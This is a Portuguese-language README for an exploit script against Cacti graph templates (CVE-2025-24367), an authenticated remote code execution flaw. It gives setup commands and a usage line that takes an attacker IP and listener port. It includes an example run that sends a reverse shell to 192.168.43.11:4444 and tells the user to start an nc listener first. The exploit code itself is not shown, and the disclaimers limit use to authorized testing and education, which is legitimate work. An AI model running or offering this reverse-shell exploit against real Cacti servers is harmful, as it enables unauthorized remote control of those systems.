
Exploit de execução remota de código autenticado para templates de gráficos do Cacti (CVE-2025-24367). Gera um payload de reverse shell para testes de penetração autorizados e pesquisa educacional.
Importante — Leia isto primeiro:
Este repositório e oexploit.pysão fornecidos apenas para fins educacionais e de pesquisa. Não utilize este código contra sistemas, redes ou serviços para os quais você não tenha autorização explícita e por escrito. O acesso não autorizado a sistemas informáticos é ilegal e antiético. Ao usar este código, você concorda em seguir as leis aplicáveis e as políticas institucionais.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Antes de executar o script, certifique-se de que você tenha um ouvinte nc em execução. Execute o script sem proxy, a menos que esteja depurando:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Lembrete final: Este script e README são para uso educacional apenas. Nunca use essas ferramentas para acessar sistemas ilegalmente.